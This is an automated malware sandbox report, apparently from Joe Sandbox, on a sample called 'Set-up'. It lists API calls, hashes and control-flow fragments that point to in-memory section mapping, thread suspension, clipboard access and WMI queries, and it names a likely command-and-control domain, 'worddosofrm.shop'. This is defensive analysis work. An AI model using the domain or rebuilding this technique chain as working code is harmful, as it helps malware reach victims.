                                                                                                                                  • Opcode Fuzzy Hash: ba45db846503753e6ad8cd74702e647084946835c16c25e977fe34de56c6ae81
                                                                                                                                  • Instruction Fuzzy Hash: D603BF7150C7C18AD335DB3884887AFBBE2ABDA324F084A6DE9D9C7392D77588458713

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.COMBASE(05923AB8,00000000,00000001,05923AA8,00000000), ref: 059175A2
                                                                                                                                  • SysAllocString.OLEAUT32(3F8D398E), ref: 05917634
                                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 05917676
                                                                                                                                  • SysAllocString.OLEAUT32(C965CB65), ref: 059176D4
                                                                                                                                  • SysAllocString.OLEAUT32(C965CB65), ref: 059177A0
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 05917814
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                  • String ID: ,-$47$C$\$m%g+$/)
                                                                                                                                  • API String ID: 65563702-582880345
                                                                                                                                  • Opcode ID: 6d3deb3b4f5d754b2721e1e9886ebe0539ee096129f5f0398d4967598b731f50
                                                                                                                                  • Instruction ID: 9269e083eba2becc9e16a14c79b71f95d3b610aded1fac9e7b958b2b64ab278a
                                                                                                                                  • Opcode Fuzzy Hash: 6d3deb3b4f5d754b2721e1e9886ebe0539ee096129f5f0398d4967598b731f50
                                                                                                                                  • Instruction Fuzzy Hash: 152243316083129BD714CF68CC85B6BBBA6EFC1314F148A1CF9959B2C1DB75E904CB96

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !$&$+$K$h$i$n
                                                                                                                                  • API String ID: 0-1869323657
                                                                                                                                  • Opcode ID: e2fe462ccd731e8f4d18125762ab81fe300dd12e9826558d1a771288f1a79bb9
                                                                                                                                  • Instruction ID: 9d41ce422cdcbce382116403e0242c384a612d3f1bf01e4d31110d6640971775
                                                                                                                                  • Opcode Fuzzy Hash: e2fe462ccd731e8f4d18125762ab81fe300dd12e9826558d1a771288f1a79bb9
                                                                                                                                  • Instruction Fuzzy Hash: B152C47160C7808BD724DB38C4987AFBBE2ABD9224F19497ED9DAC73D1D67888418713
                                                                                                                                  APIs
                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 054C1C54
                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 054C1CFC
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 054C2070
                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 054C2125
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 054C2142
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 054C21E5
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 054C2218
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$ProtectSection$View$AllocCreate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2664363762-0
                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                  • Instruction ID: dc7041101ddf62c8f9ccaf102eab9dd7a42ebf0fd4c17b5c061e087eb6cdf515
                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                  • Instruction Fuzzy Hash: 34427A79608301AFD764CF25C844BABBBE9BFC8714F0449AEF9869B251D7B0E841CB51

Control-flow Graph
[Graph rendering not reproduced (legend: Executed / Not Executed). The graphed code starts at 58f200f and calls CoUninitialize.]
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Uninitialize
                                                                                                                                  • String ID: ),>,$; 34$[wy$worddosofrm.shop
                                                                                                                                  • API String ID: 3861434553-1776702198
                                                                                                                                  • Opcode ID: de2ceb5b447c03903f310788b348aa4e68bd9bd4e3948ba88c8f274fc3f39cc6
                                                                                                                                  • Instruction ID: 139cc36fbab4cb097469fc9a8864441a4689dcd787033a7d94ee52be86796f1f
                                                                                                                                  • Opcode Fuzzy Hash: de2ceb5b447c03903f310788b348aa4e68bd9bd4e3948ba88c8f274fc3f39cc6
                                                                                                                                  • Instruction Fuzzy Hash: 34A1D174209B828FD321CF29C490626FBF2FF5A300B18869CD9D68BB55C735B856CB95

Control-flow Graph
[Graph rendering not reproduced (legend: Executed / Not Executed). The graphed code starts at 54703fb and calls GetPEB and CreateThread.]
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0547069E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread
                                                                                                                                  • String ID: %Q8
                                                                                                                                  • API String ID: 2422867632-2726095304
                                                                                                                                  • Opcode ID: 89bde1e733b70f67982f4dd5d373a6ee043e125ba48ce3fa45a4cbc8249d16df
                                                                                                                                  • Instruction ID: 0b4f662437457ef77752bbf2bbedc9d7e3cf6ecf3e00f75fb70c5e700c3acfc2
                                                                                                                                  • Opcode Fuzzy Hash: 89bde1e733b70f67982f4dd5d373a6ee043e125ba48ce3fa45a4cbc8249d16df
                                                                                                                                  • Instruction Fuzzy Hash: E812B3B5E01219DBDB14CF98C994BEEBBB2FF88304F2481A9D519AB385C7346A41CF54

Control-flow Graph
[Graph rendering not reproduced (legend: Executed / Not Executed). The graphed code starts at 54709bb and calls GetPEB and CreateThread.]
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 05470A87
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread
                                                                                                                                  • String ID: ,
                                                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                  • Instruction ID: f4e4a31f7939efe15284cc2877a054509b64a7a5aec557271067c707c8dd500d
                                                                                                                                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                  • Instruction Fuzzy Hash: 4D41A274A01209EFDB04CF98C994BEEB7B1BB88314F208199D515AB380D771AE81CF94
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+($@
                                                                                                                                  • API String ID: 2994545307-2878053842
                                                                                                                                  • Opcode ID: 0dd6f937da4491d41dee888483ee4b5b45b003388dd126cb5176a7d11f5a876e
                                                                                                                                  • Instruction ID: 8733adf560ab537c41e806250f464e4f4d7c988b450b883a36193649f5f8d2cd
                                                                                                                                  • Opcode Fuzzy Hash: 0dd6f937da4491d41dee888483ee4b5b45b003388dd126cb5176a7d11f5a876e
                                                                                                                                  • Instruction Fuzzy Hash: 0B3102B0A083209BD714DF28D889B7BB7F9FF85324F14862CE89957395E7359904CB82
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d94bbe24efa32eff2df4b2ee6b7b0315668c2ffe41fc75c05200c294de0f4e26
                                                                                                                                  • Instruction ID: 5999089e7b516b6ca7ee0c22693d6d31f871ad52aee1db58733b4ea4952c7d08
                                                                                                                                  • Opcode Fuzzy Hash: d94bbe24efa32eff2df4b2ee6b7b0315668c2ffe41fc75c05200c294de0f4e26
                                                                                                                                  • Instruction Fuzzy Hash: 0841C4B290C3519FCB24CF18C45166FB7E2ABD9204F19892DEADAC7242E635DD05CB92
                                                                                                                                  APIs
                                                                                                                                  • LdrInitializeThunk.NTDLL(059204D8,?,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0591CE4E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                  • Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
                                                                                                                                  • Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                  • Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+(
                                                                                                                                  • API String ID: 2994545307-3233224373
                                                                                                                                  • Opcode ID: b7befcff905520bad6801cdfe0de385769e9770f6a4e70e09a45de539f679204
                                                                                                                                  • Instruction ID: 0072a07905d4c93410745d046db43b7e9e8eb812656d8b40500a50fb91cea607
                                                                                                                                  • Opcode Fuzzy Hash: b7befcff905520bad6801cdfe0de385769e9770f6a4e70e09a45de539f679204
                                                                                                                                  • Instruction Fuzzy Hash: 1D61F13160C3219FD728CE24D891A3FB7E6FBC5314F19892CE99687295D731AC11D792
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+(
                                                                                                                                  • API String ID: 2994545307-3233224373
                                                                                                                                  • Opcode ID: f764bd4585df1a10212cac4152ccb04379c25e58bb52a53a932f388786026ed7
                                                                                                                                  • Instruction ID: 1be041b98559f0adba7b9fe2e285b2366dd8c08e01c95ef0ffc11a32a3869fbb
                                                                                                                                  • Opcode Fuzzy Hash: f764bd4585df1a10212cac4152ccb04379c25e58bb52a53a932f388786026ed7
                                                                                                                                  • Instruction Fuzzy Hash: 3571F575608311ABDB24DF28C855A3FB7E6FFC4750F19C92CE88A8B259EB30E8518741
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+(
                                                                                                                                  • API String ID: 2994545307-3233224373
                                                                                                                                  • Opcode ID: e0742271d4981fc2b56cf44d7e8a7dbc4811d25293c3cacdd4ab4d7ce318f594
                                                                                                                                  • Instruction ID: a22780f3390d42b2b3c0db7fea2af79e5e6637697428f0bf930f25d90abd55ce
                                                                                                                                  • Opcode Fuzzy Hash: e0742271d4981fc2b56cf44d7e8a7dbc4811d25293c3cacdd4ab4d7ce318f594
                                                                                                                                  • Instruction Fuzzy Hash: 2D31273835C314AFF7248A289C89B3FB7EAFB85714F24592CF5C697288D660EC508A45
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                  • Opcode ID: 0f5fb32b003c89ed800a9a93822042cb7131f7970a9929e671da155c8b818300
                                                                                                                                  • Instruction ID: 867c3a4f397934ce7702ab590f146ce9d98a96fe118283332ef1f9b76d5e845c
                                                                                                                                  • Opcode Fuzzy Hash: 0f5fb32b003c89ed800a9a93822042cb7131f7970a9929e671da155c8b818300
                                                                                                                                  • Instruction Fuzzy Hash: 2821F37111C3049FC724DF18D8C566FBBF9FB86328F14892CEA9987290D3359808CBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: d1e24e57a2514775cc17d10727ebd4cfa5190f1f8c9b5dec9cee1ccf620f94b3
                                                                                                                                  • Instruction ID: 8b15771e857d03dcc05bf4c2262e64002ea4310bb07e661e4c2fa70dd02c1adf
                                                                                                                                  • Opcode Fuzzy Hash: d1e24e57a2514775cc17d10727ebd4cfa5190f1f8c9b5dec9cee1ccf620f94b3
                                                                                                                                  • Instruction Fuzzy Hash: D5A148716483019FDB24CE28C85577B7BE6EF81210F4AAD2DE9868B3C1E735D905CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 0c03cdca4e6ad8349cf13fc23bd730f1a9669a66ea10b4e1dd078099aa0d9821
                                                                                                                                  • Instruction ID: e74ef5f261bdd979d0f2ce17b46169430fb0136f17222e4b8f7717e5e06f0629
                                                                                                                                  • Opcode Fuzzy Hash: 0c03cdca4e6ad8349cf13fc23bd730f1a9669a66ea10b4e1dd078099aa0d9821
                                                                                                                                  • Instruction Fuzzy Hash: 3D616A32B082245FD324DE28CC51B6BBBE3FB85614F1D862DEC8997381E631DC018B89
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e84df79f5c60416cb13f296e0ef41803c9098193759d66e46c336af5e9fcea31
                                                                                                                                  • Instruction ID: fab1b10567518b3923ce313ced1e92cca68d017e6eb2756539e6e0e1831458c2
                                                                                                                                  • Opcode Fuzzy Hash: e84df79f5c60416cb13f296e0ef41803c9098193759d66e46c336af5e9fcea31
                                                                                                                                  • Instruction Fuzzy Hash: 5741FC745083049FD710DF24D859B2BBBEAEF82704F009D1CF4959B291E778C90ACB92

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,460C02D8,011231ED,?,00000003,0111AB4D,460C02D8,?,00E5119D,00E4FCD0,00E3A8EB,460C02D8), ref: 01129639
                                                                                                                                  • _free.LIBCMT ref: 0112966C
                                                                                                                                  • _free.LIBCMT ref: 01129694
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 011296A1
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 011296AD
                                                                                                                                  • _abort.LIBCMT ref: 011296B3
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,011247A9,0112A61C,?,0112488C,?,00000004,00000000,?,?,?,01125884,?,00000000), ref: 011296BE
                                                                                                                                  • _free.LIBCMT ref: 011296F3
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 01129727
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                  • String ID: Ph
                                                                                                                                  • API String ID: 3160817290-1269273566
                                                                                                                                  • Opcode ID: 1b11ed0f31bb42bfc7d233b7709c3286f3d42dc312ff069491820cff98ad47e4
                                                                                                                                  • Instruction ID: 21041ba602c0b3671becdcd9a3a14009d33437801ce197859b028bdee6d3bf8a
                                                                                                                                  • Opcode Fuzzy Hash: 1b11ed0f31bb42bfc7d233b7709c3286f3d42dc312ff069491820cff98ad47e4
                                                                                                                                  • Instruction Fuzzy Hash: 461127361045362BD73F263D7C98E6A269A9FC167CF220129F918D3284EF3AC865C165

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F187B
                                                                                                                                  • ExitProcess.KERNEL32(00000003), ref: 058F1897
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F18B3
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F18CF
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F190F
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F192B
                                                                                                                                    • Part of subcall function 05911C40: OpenClipboard.USER32 ref: 05911C62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess$ClipboardOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3599724458-0
                                                                                                                                  • Opcode ID: efe17c8d90af9d06c0cb217cbda731e623b62d88f60362be8e128c15e40df5b2
                                                                                                                                  • Instruction ID: c1bedb14eb7a2432685eed851792d6703fbc0cec72c56677d91d286ea20bc0f5
                                                                                                                                  • Opcode Fuzzy Hash: efe17c8d90af9d06c0cb217cbda731e623b62d88f60362be8e128c15e40df5b2
                                                                                                                                  • Instruction Fuzzy Hash: 61510876700B408BD725EB29D85A73BB6A3AFD6614F0D852CC85B87391EA34B8068752

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1098 5470b0b-5470b52 CreateToolhelp32Snapshot 1101 5470c28-5470c2b 1098->1101 1102 5470b58-5470b79 Thread32First 1098->1102 1103 5470c14-5470c23 1102->1103 1104 5470b7f-5470b85 1102->1104 1103->1101 1105 5470b87-5470b8d 1104->1105 1106 5470bf4-5470c0e 1104->1106 1105->1106 1107 5470b8f-5470bae 1105->1107 1106->1103 1106->1104 1107->1106 1110 5470bb0-5470bb4 1107->1110 1111 5470bb6-5470bca Wow64SuspendThread 1110->1111 1112 5470bcc-5470bdb 1110->1112 1113 5470be0-5470bf2 CloseHandle 1111->1113 1112->1113 1113->1106
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,05470651,?,00000001,?,81EC8B55,000000FF), ref: 05470B49
                                                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 05470B75
                                                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 05470BC8
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 05470BF2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849706056-0
                                                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                  • Instruction ID: 88275613ec9cca660b8611a22bfa2a9a775613137b00453cf5060992d31213d7
                                                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                  • Instruction Fuzzy Hash: B2410A71A00108AFDB18DF98C494FEEB7B6EF88300F108069E6199B794DA74AE45CB54

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1114 58ed2c0-58ed2cb call 591ba60 1117 58ed358-58ed35a ExitProcess 1114->1117 1118 58ed2d1-58ed2d8 call 5914420 1114->1118 1121 58ed2da-58ed2eb 1118->1121 1122 58ed353 call 591cd30 1118->1122 1124 58ed2f0-58ed328 1121->1124 1122->1117 1124->1124 1125 58ed32a-58ed338 GetCurrentThreadId GetForegroundWindow 1124->1125 1126 58ed33a GetCurrentProcessId 1125->1126 1127 58ed340-58ed347 call 58ee4c0 1125->1127 1126->1127 1127->1122 1130 58ed349 call 58f10c0 1127->1130 1132 58ed34e call 58efc90 1130->1132 1132->1122
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3118123366-0
                                                                                                                                  • Opcode ID: b2bf01f2d33a2feed2c3248959558bdfb8620b286b342898f873fb462e0cbea1
                                                                                                                                  • Instruction ID: 5e60c03aac698e1fee15ec3c88e1c7c942ee428fce8f92a5e67bc56dfeb71ede
                                                                                                                                  • Opcode Fuzzy Hash: b2bf01f2d33a2feed2c3248959558bdfb8620b286b342898f873fb462e0cbea1
                                                                                                                                  • Instruction Fuzzy Hash: 7501F73171D21087DF34BB799A1F36E7BA26FE2204F19856CDD8ADB181ED244C05C652

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1225 54c2839-54c284c 1226 54c284e-54c2851 1225->1226 1227 54c2864-54c286e 1225->1227 1228 54c2853-54c2856 1226->1228 1229 54c287d-54c2889 1227->1229 1230 54c2870-54c2878 1227->1230 1228->1227 1231 54c2858-54c2862 1228->1231 1232 54c288c-54c2891 1229->1232 1230->1229 1231->1227 1231->1228 1233 54c28c4-54c28cb LoadLibraryA 1232->1233 1234 54c2893-54c289e 1232->1234 1237 54c28ce-54c28d2 1233->1237 1235 54c28ba-54c28be 1234->1235 1236 54c28a0-54c28b8 call 54c2f07 1234->1236 1235->1232 1239 54c28c0-54c28c2 1235->1239 1236->1235 1241 54c28d3-54c28d5 1236->1241 1239->1233 1239->1237 1241->1237
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 054C28CB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID: .dll
                                                                                                                                  • API String ID: 1029625771-2738580789
                                                                                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                  • Instruction ID: 0d9c19afc971d430271569fb154028022c7aee63f332c03a6f1c84f46a70b6ba
                                                                                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                  • Instruction Fuzzy Hash: A321D83D6082859FEB65CFA9C444BAA7FA4BF41250F1842EED84287741D7F0E8458760

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1242 58f1fb1-58f200c CoInitializeEx * 2
                                                                                                                                  APIs
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 058F1FB5
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 058F1FF3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: a4e96e34c5c2454836cc1b434957e34867b9d51f6420eaa2d9440da7d0948753
                                                                                                                                  • Instruction ID: 9981c0e72993d7a6445036b0a9b989a9377652a76d201c92d6ac9ac61a96eed8
                                                                                                                                  • Opcode Fuzzy Hash: a4e96e34c5c2454836cc1b434957e34867b9d51f6420eaa2d9440da7d0948753
                                                                                                                                  • Instruction Fuzzy Hash: 9CF01C74A587409BE770AB39E50FB163E71B744701F40861CF9E61A6C9DE30541A8FD7
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 054C1505
                                                                                                                                  Memory Dump Source
